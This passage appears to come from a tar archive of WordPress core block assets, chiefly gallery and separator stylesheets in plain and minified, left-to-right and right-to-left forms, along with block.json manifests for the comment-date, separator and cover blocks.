    width:calc(33.33% - var(--wp--style--unstable-gallery-gap, 16px)*.66667);
  }
  .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2),.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2)~figure.wp-block-image:not(#individual-image){
    width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)*.5);
  }
  .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:last-child{
    width:100%;
  }
}
.wp-block-gallery.has-nested-images.alignleft,.wp-block-gallery.has-nested-images.alignright{
  max-width:420px;
  width:100%;
}
.wp-block-gallery.has-nested-images.aligncenter{
  justify-content:center;
}gallery/style-rtl.css000060400000037207151330427370010666 0ustar00.blocks-gallery-grid:not(.has-nested-images),.wp-block-gallery:not(.has-nested-images){
  display:flex;
  flex-wrap:wrap;
  list-style-type:none;
  margin:0;
  padding:0;
}
.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item{
  display:flex;
  flex-direction:column;
  flex-grow:1;
  justify-content:center;
  margin:0 0 1em 1em;
  position:relative;
  width:calc(50% - 1em);
}
.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n){
  margin-left:0;
}
.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figure,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figure{
  align-items:flex-end;
  display:flex;
  height:100%;
  justify-content:flex-start;
  margin:0;
}
.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item img{
  display:block;
  height:auto;
  max-width:100%;
  width:auto;
}
.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption{
  background:linear-gradient(0deg, #000000b3, #0000004d 70%, #0000);
  bottom:0;
  box-sizing:border-box;
  color:#fff;
  font-size:.8em;
  margin:0;
  max-height:100%;
  overflow:auto;
  padding:3em .77em .7em;
  position:absolute;
  text-align:center;
  width:100%;
  z-index:2;
}
.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption img{
  display:inline;
}
.blocks-gallery-grid:not(.has-nested-images) figcaption,.wp-block-gallery:not(.has-nested-images) figcaption{
  flex-grow:1;
}
.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item img{
  flex:1;
  height:100%;
  object-fit:cover;
  width:100%;
}
.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item{
  margin-left:0;
  width:100%;
}
@media (min-width:600px){
  .blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item{
    margin-left:1em;
    width:calc(33.33333% - .66667em);
  }
  .blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item{
    margin-left:1em;
    width:calc(25% - .75em);
  }
  .blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item{
    margin-left:1em;
    width:calc(20% - .8em);
  }
  .blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item{
    margin-left:1em;
    width:calc(16.66667% - .83333em);
  }
  .blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item{
    margin-left:1em;
    width:calc(14.28571% - .85714em);
  }
  .blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item{
    margin-left:1em;
    width:calc(12.5% - .875em);
  }
  .blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n){
    margin-left:0;
  }
}
.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:last-child,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:last-child{
  margin-left:0;
}
.blocks-gallery-grid:not(.has-nested-images).alignleft,.blocks-gallery-grid:not(.has-nested-images).alignright,.wp-block-gallery:not(.has-nested-images).alignleft,.wp-block-gallery:not(.has-nested-images).alignright{
  max-width:420px;
  width:100%;
}
.blocks-gallery-grid:not(.has-nested-images).aligncenter .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images).aligncenter .blocks-gallery-item figure{
  justify-content:center;
}

.wp-block-gallery:not(.is-cropped) .blocks-gallery-item{
  align-self:flex-start;
}

figure.wp-block-gallery.has-nested-images{
  align-items:normal;
}

.wp-block-gallery.has-nested-images figure.wp-block-image:not(#individual-image){
  margin:0;
  width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)/2);
}
.wp-block-gallery.has-nested-images figure.wp-block-image{
  box-sizing:border-box;
  display:flex;
  flex-direction:column;
  flex-grow:1;
  justify-content:center;
  max-width:100%;
  position:relative;
}
.wp-block-gallery.has-nested-images figure.wp-block-image>a,.wp-block-gallery.has-nested-images figure.wp-block-image>div{
  flex-direction:column;
  flex-grow:1;
  margin:0;
}
.wp-block-gallery.has-nested-images figure.wp-block-image img{
  display:block;
  height:auto;
  max-width:100% !important;
  width:auto;
}
.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{
  background:linear-gradient(0deg, #000000b3, #0000004d 70%, #0000);
  bottom:0;
  box-sizing:border-box;
  color:#fff;
  font-size:13px;
  margin-bottom:0;
  max-height:60%;
  overflow:auto;
  padding:0 8px 8px;
  position:absolute;
  right:0;
  scrollbar-color:#0000 #0000;
  scrollbar-gutter:stable both-edges;
  scrollbar-width:thin;
  text-align:center;
  width:100%;
  will-change:transform;
}
.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar{
  height:12px;
  width:12px;
}
.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar-track{
  background-color:initial;
}
.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar-thumb{
  background-clip:padding-box;
  background-color:initial;
  border:3px solid #0000;
  border-radius:8px;
}
.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus-within::-webkit-scrollbar-thumb,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus::-webkit-scrollbar-thumb,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover::-webkit-scrollbar-thumb{
  background-color:#fffc;
}
.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus-within,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover{
  scrollbar-color:#fffc #0000;
}
@media (hover:none){
  .wp-block-gallery.has-nested-images figure.wp-block-image figcaption{
    scrollbar-color:#fffc #0000;
  }
}
.wp-block-gallery.has-nested-images figure.wp-block-image figcaption img{
  display:inline;
}
.wp-block-gallery.has-nested-images figure.wp-block-image figcaption a{
  color:inherit;
}
.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border img{
  box-sizing:border-box;
}
.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>a,.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>div,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>a,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>div{
  flex:1 1 auto;
}
.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded figcaption{
  background:none;
  color:inherit;
  flex:initial;
  margin:0;
  padding:10px 10px 9px;
  position:relative;
}
.wp-block-gallery.has-nested-images figcaption{
  flex-basis:100%;
  flex-grow:1;
  text-align:center;
}
.wp-block-gallery.has-nested-images:not(.is-cropped) figure.wp-block-image:not(#individual-image){
  margin-bottom:auto;
  margin-top:0;
}
.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image){
  align-self:inherit;
}
.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>div:not(.components-drop-zone){
  display:flex;
}
.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) img{
  flex:1 0 0%;
  height:100%;
  object-fit:cover;
  width:100%;
}
.wp-block-gallery.has-nested-images.columns-1 figure.wp-block-image:not(#individual-image){
  width:100%;
}
@media (min-width:600px){
  .wp-block-gallery.has-nested-images.columns-3 figure.wp-block-image:not(#individual-image){
    width:calc(33.33333% - var(--wp--style--unstable-gallery-gap, 16px)*.66667);
  }
  .wp-block-gallery.has-nested-images.columns-4 figure.wp-block-image:not(#individual-image){
    width:calc(25% - var(--wp--style--unstable-gallery-gap, 16px)*.75);
  }
  .wp-block-gallery.has-nested-images.columns-5 figure.wp-block-image:not(#individual-image){
    width:calc(20% - var(--wp--style--unstable-gallery-gap, 16px)*.8);
  }
  .wp-block-gallery.has-nested-images.columns-6 figure.wp-block-image:not(#individual-image){
    width:calc(16.66667% - var(--wp--style--unstable-gallery-gap, 16px)*.83333);
  }
  .wp-block-gallery.has-nested-images.columns-7 figure.wp-block-image:not(#individual-image){
    width:calc(14.28571% - var(--wp--style--unstable-gallery-gap, 16px)*.85714);
  }
  .wp-block-gallery.has-nested-images.columns-8 figure.wp-block-image:not(#individual-image){
    width:calc(12.5% - var(--wp--style--unstable-gallery-gap, 16px)*.875);
  }
  .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image){
    width:calc(33.33% - var(--wp--style--unstable-gallery-gap, 16px)*.66667);
  }
  .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2),.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2)~figure.wp-block-image:not(#individual-image){
    width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)*.5);
  }
  .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:last-child{
    width:100%;
  }
}
.wp-block-gallery.has-nested-images.alignleft,.wp-block-gallery.has-nested-images.alignright{
  max-width:420px;
  width:100%;
}
.wp-block-gallery.has-nested-images.aligncenter{
  justify-content:center;
}gallery/editor-rtl.min.css000060400000006611151330427370011571 0ustar00:root :where(figure.wp-block-gallery){display:block}:root :where(figure.wp-block-gallery)>.blocks-gallery-caption{flex:0 0 100%}:root :where(figure.wp-block-gallery)>.blocks-gallery-media-placeholder-wrapper{flex-basis:100%}:root :where(figure.wp-block-gallery) .wp-block-image .components-notice.is-error{display:block}:root :where(figure.wp-block-gallery) .wp-block-image .components-notice__content{margin:4px 0}:root :where(figure.wp-block-gallery) .wp-block-image .components-notice__dismiss{left:5px;position:absolute;top:0}:root :where(figure.wp-block-gallery) .block-editor-media-placeholder.is-appender .components-placeholder__label{display:none}:root :where(figure.wp-block-gallery) .block-editor-media-placeholder.is-appender .block-editor-media-placeholder__button{margin-bottom:0}:root :where(figure.wp-block-gallery) .block-editor-media-placeholder{margin:0}:root :where(figure.wp-block-gallery) .block-editor-media-placeholder .components-placeholder__label{display:flex}:root :where(figure.wp-block-gallery) .block-editor-media-placeholder figcaption{z-index:2}:root :where(figure.wp-block-gallery) .components-spinner{margin-right:-9px;margin-top:-9px;position:absolute;right:50%;top:50%}.gallery-settings-buttons .components-button:first-child{margin-left:8px}.gallery-image-sizes .components-base-control__label{display:block;margin-bottom:4px}.gallery-image-sizes .gallery-image-sizes__loading{align-items:center;color:#757575;display:flex;font-size:12px}.gallery-image-sizes .components-spinner{margin:0 4px 0 8px}.blocks-gallery-item figure:not(.is-selected):focus,.blocks-gallery-item img:focus{outline:none}.blocks-gallery-item figure.is-selected:before{bottom:0;box-shadow:0 0 0 1px #fff inset,0 0 0 3px var(--wp-admin-theme-color) inset;content:"";left:0;outline:2px solid #0000;pointer-events:none;position:absolute;right:0;top:0;z-index:1}.blocks-gallery-item figure.is-transient img{opacity:.3}.blocks-gallery-item .is-selected .block-library-gallery-item__inline-menu{display:inline-flex}.blocks-gallery-item .block-editor-media-placeholder{height:100%;margin:0}.blocks-gallery-item .block-editor-media-placeholder .components-placeholder__label{display:flex}.block-library-gallery-item__inline-menu{background:#fff;border:1px solid #1e1e1e;border-radius:2px;display:none;margin:8px;position:absolute;top:-2px;transition:box-shadow .2s ease-out;z-index:20}@media (prefers-reduced-motion:reduce){.block-library-gallery-item__inline-menu{transition-delay:0s;transition-duration:0s}}.block-library-gallery-item__inline-menu:hover{box-shadow:0 .7px 1px #0000001a,0 1.2px 1.7px -.2px #0000001a,0 2.3px 3.3px -.5px #0000001a}@media (min-width:600px){.columns-7 .block-library-gallery-item__inline-menu,.columns-8 .block-library-gallery-item__inline-menu{padding:2px}}.block-library-gallery-item__inline-menu .components-button.has-icon:not(:focus){border:none;box-shadow:none}@media (min-width:600px){.columns-7 .block-library-gallery-item__inline-menu .components-button.has-icon,.columns-8 .block-library-gallery-item__inline-menu .components-button.has-icon{height:inherit;padding:0;width:inherit}}.block-library-gallery-item__inline-menu.is-left{right:-2px}.block-library-gallery-item__inline-menu.is-right{left:-2px}.wp-block-gallery ul.blocks-gallery-grid{margin:0;padding:0}@media (min-width:600px){.wp-block-update-gallery-modal{max-width:480px}}.wp-block-update-gallery-modal-buttons{display:flex;gap:12px;justify-content:flex-end}gallery/editor.min.css000060400000006611151330427370010772 0ustar00:root :where(figure.wp-block-gallery){display:block}:root :where(figure.wp-block-gallery)>.blocks-gallery-caption{flex:0 0 100%}:root :where(figure.wp-block-gallery)>.blocks-gallery-media-placeholder-wrapper{flex-basis:100%}:root :where(figure.wp-block-gallery) .wp-block-image .components-notice.is-error{display:block}:root :where(figure.wp-block-gallery) .wp-block-image .components-notice__content{margin:4px 0}:root :where(figure.wp-block-gallery) .wp-block-image .components-notice__dismiss{position:absolute;right:5px;top:0}:root :where(figure.wp-block-gallery) .block-editor-media-placeholder.is-appender .components-placeholder__label{display:none}:root :where(figure.wp-block-gallery) .block-editor-media-placeholder.is-appender .block-editor-media-placeholder__button{margin-bottom:0}:root :where(figure.wp-block-gallery) .block-editor-media-placeholder{margin:0}:root :where(figure.wp-block-gallery) .block-editor-media-placeholder .components-placeholder__label{display:flex}:root :where(figure.wp-block-gallery) .block-editor-media-placeholder figcaption{z-index:2}:root :where(figure.wp-block-gallery) .components-spinner{left:50%;margin-left:-9px;margin-top:-9px;position:absolute;top:50%}.gallery-settings-buttons .components-button:first-child{margin-right:8px}.gallery-image-sizes .components-base-control__label{display:block;margin-bottom:4px}.gallery-image-sizes .gallery-image-sizes__loading{align-items:center;color:#757575;display:flex;font-size:12px}.gallery-image-sizes .components-spinner{margin:0 8px 0 4px}.blocks-gallery-item figure:not(.is-selected):focus,.blocks-gallery-item img:focus{outline:none}.blocks-gallery-item figure.is-selected:before{bottom:0;box-shadow:0 0 0 1px #fff inset,0 0 0 3px var(--wp-admin-theme-color) inset;content:"";left:0;outline:2px solid #0000;pointer-events:none;position:absolute;right:0;top:0;z-index:1}.blocks-gallery-item figure.is-transient img{opacity:.3}.blocks-gallery-item .is-selected .block-library-gallery-item__inline-menu{display:inline-flex}.blocks-gallery-item .block-editor-media-placeholder{height:100%;margin:0}.blocks-gallery-item .block-editor-media-placeholder .components-placeholder__label{display:flex}.block-library-gallery-item__inline-menu{background:#fff;border:1px solid #1e1e1e;border-radius:2px;display:none;margin:8px;position:absolute;top:-2px;transition:box-shadow .2s ease-out;z-index:20}@media (prefers-reduced-motion:reduce){.block-library-gallery-item__inline-menu{transition-delay:0s;transition-duration:0s}}.block-library-gallery-item__inline-menu:hover{box-shadow:0 .7px 1px #0000001a,0 1.2px 1.7px -.2px #0000001a,0 2.3px 3.3px -.5px #0000001a}@media (min-width:600px){.columns-7 .block-library-gallery-item__inline-menu,.columns-8 .block-library-gallery-item__inline-menu{padding:2px}}.block-library-gallery-item__inline-menu .components-button.has-icon:not(:focus){border:none;box-shadow:none}@media (min-width:600px){.columns-7 .block-library-gallery-item__inline-menu .components-button.has-icon,.columns-8 .block-library-gallery-item__inline-menu .components-button.has-icon{height:inherit;padding:0;width:inherit}}.block-library-gallery-item__inline-menu.is-left{left:-2px}.block-library-gallery-item__inline-menu.is-right{right:-2px}.wp-block-gallery ul.blocks-gallery-grid{margin:0;padding:0}@media (min-width:600px){.wp-block-update-gallery-modal{max-width:480px}}.wp-block-update-gallery-modal-buttons{display:flex;gap:12px;justify-content:flex-end}comment-date/style-rtl.min.css000064400000000055151330427370012361 0ustar00.wp-block-comment-date{box-sizing:border-box}comment-date/style.css000064400000000062151330427370010776 0ustar00.wp-block-comment-date{
  box-sizing:border-box;
}comment-date/style-rtl.css000064400000000062151330427370011575 0ustar00.wp-block-comment-date{
  box-sizing:border-box;
}comment-date/block.json000060400000002130151330427370011103 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/comment-date",
	"title": "Comment Date",
	"category": "theme",
	"ancestor": [ "core/comment-template" ],
	"description": "Displays the date on which the comment was posted.",
	"textdomain": "default",
	"attributes": {
		"format": {
			"type": "string"
		},
		"isLink": {
			"type": "boolean",
			"default": true
		}
	},
	"usesContext": [ "commentId" ],
	"supports": {
		"html": false,
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true,
				"link": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	}
}
comment-date/style.min.css000064400000000055151330427370011562 0ustar00.wp-block-comment-date{box-sizing:border-box}separator/style-rtl.css000060400000000715151330427370011221 0ustar00@charset "UTF-8";

.wp-block-separator{
  border:none;
  border-top:2px solid;
}

:root :where(.wp-block-separator.is-style-dots){
  height:auto;
  line-height:1;
  text-align:center;
}
:root :where(.wp-block-separator.is-style-dots):before{
  color:currentColor;
  content:"···";
  font-family:serif;
  font-size:1.5em;
  letter-spacing:2em;
  padding-left:2em;
}

.wp-block-separator.is-style-dots{
  background:none !important;
  border:none !important;
}separator/editor.min.css000060400000000141151330427370011323 0ustar00.block-editor-block-list__block[data-type="core/separator"]{padding-bottom:.1px;padding-top:.1px}separator/style-rtl.min.css000060400000000625151330427370012003 0ustar00@charset "UTF-8";.wp-block-separator{border:none;border-top:2px solid}:root :where(.wp-block-separator.is-style-dots){height:auto;line-height:1;text-align:center}:root :where(.wp-block-separator.is-style-dots):before{color:currentColor;content:"···";font-family:serif;font-size:1.5em;letter-spacing:2em;padding-left:2em}.wp-block-separator.is-style-dots{background:none!important;border:none!important}separator/theme.min.css000060400000000665151330427370011152 0ustar00.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}separator/block.json000060400000002042151330427370010530 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/separator",
	"title": "Separator",
	"category": "design",
	"description": "Create a break between ideas or sections with a horizontal separator.",
	"keywords": [ "horizontal-line", "hr", "divider" ],
	"textdomain": "default",
	"attributes": {
		"opacity": {
			"type": "string",
			"default": "alpha-channel"
		}
	},
	"supports": {
		"anchor": true,
		"align": [ "center", "wide", "full" ],
		"color": {
			"enableContrastChecker": false,
			"__experimentalSkipSerialization": true,
			"gradients": true,
			"background": true,
			"text": false,
			"__experimentalDefaultControls": {
				"background": true
			}
		},
		"spacing": {
			"margin": [ "top", "bottom" ]
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"styles": [
		{ "name": "default", "label": "Default", "isDefault": true },
		{ "name": "wide", "label": "Wide Line" },
		{ "name": "dots", "label": "Dots" }
	],
	"editorStyle": "wp-block-separator-editor",
	"style": "wp-block-separator"
}
separator/theme.css000060400000000745151330427370010367 0ustar00.wp-block-separator.has-css-opacity{
  opacity:.4;
}

.wp-block-separator{
  border:none;
  border-bottom:2px solid;
  margin-left:auto;
  margin-right:auto;
}
.wp-block-separator.has-alpha-channel-opacity{
  opacity:1;
}
.wp-block-separator:not(.is-style-wide):not(.is-style-dots){
  width:100px;
}
.wp-block-separator.has-background:not(.is-style-dots){
  border-bottom:none;
  height:1px;
}
.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){
  height:2px;
}separator/editor-rtl.css000060400000000151151330427370011341 0ustar00.block-editor-block-list__block[data-type="core/separator"]{
  padding-bottom:.1px;
  padding-top:.1px;
}separator/style.css000060400000000715151330427370010422 0ustar00@charset "UTF-8";

.wp-block-separator{
  border:none;
  border-top:2px solid;
}

:root :where(.wp-block-separator.is-style-dots){
  height:auto;
  line-height:1;
  text-align:center;
}
:root :where(.wp-block-separator.is-style-dots):before{
  color:currentColor;
  content:"···";
  font-family:serif;
  font-size:1.5em;
  letter-spacing:2em;
  padding-left:2em;
}

.wp-block-separator.is-style-dots{
  background:none !important;
  border:none !important;
}separator/editor-rtl.min.css000060400000000141151330427370012122 0ustar00.block-editor-block-list__block[data-type="core/separator"]{padding-bottom:.1px;padding-top:.1px}separator/style.min.css000060400000000625151330427370011204 0ustar00@charset "UTF-8";.wp-block-separator{border:none;border-top:2px solid}:root :where(.wp-block-separator.is-style-dots){height:auto;line-height:1;text-align:center}:root :where(.wp-block-separator.is-style-dots):before{color:currentColor;content:"···";font-family:serif;font-size:1.5em;letter-spacing:2em;padding-left:2em}.wp-block-separator.is-style-dots{background:none!important;border:none!important}separator/theme-rtl.css000060400000000745151330427370011166 0ustar00.wp-block-separator.has-css-opacity{
  opacity:.4;
}

.wp-block-separator{
  border:none;
  border-bottom:2px solid;
  margin-left:auto;
  margin-right:auto;
}
.wp-block-separator.has-alpha-channel-opacity{
  opacity:1;
}
.wp-block-separator:not(.is-style-wide):not(.is-style-dots){
  width:100px;
}
.wp-block-separator.has-background:not(.is-style-dots){
  border-bottom:none;
  height:1px;
}
.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){
  height:2px;
}separator/theme-rtl.min.css000060400000000665151330427370011751 0ustar00.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}separator/editor.css000060400000000151151330427370010542 0ustar00.block-editor-block-list__block[data-type="core/separator"]{
  padding-bottom:.1px;
  padding-top:.1px;
}cover/block.json000060400000005344151330427370007656 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/cover",
	"title": "Cover",
	"category": "media",
	"description": "Add an image or video with a text overlay.",
	"textdomain": "default",
	"attributes": {
		"url": {
			"type": "string"
		},
		"useFeaturedImage": {
			"type": "boolean",
			"default": false
		},
		"id": {
			"type": "number"
		},
		"alt": {
			"type": "string",
			"default": ""
		},
		"hasParallax": {
			"type": "boolean",
			"default": false
		},
		"isRepeated": {
			"type": "boolean",
			"default": false
		},
		"dimRatio": {
			"type": "number",
			"default": 100
		},
		"overlayColor": {
			"type": "string"
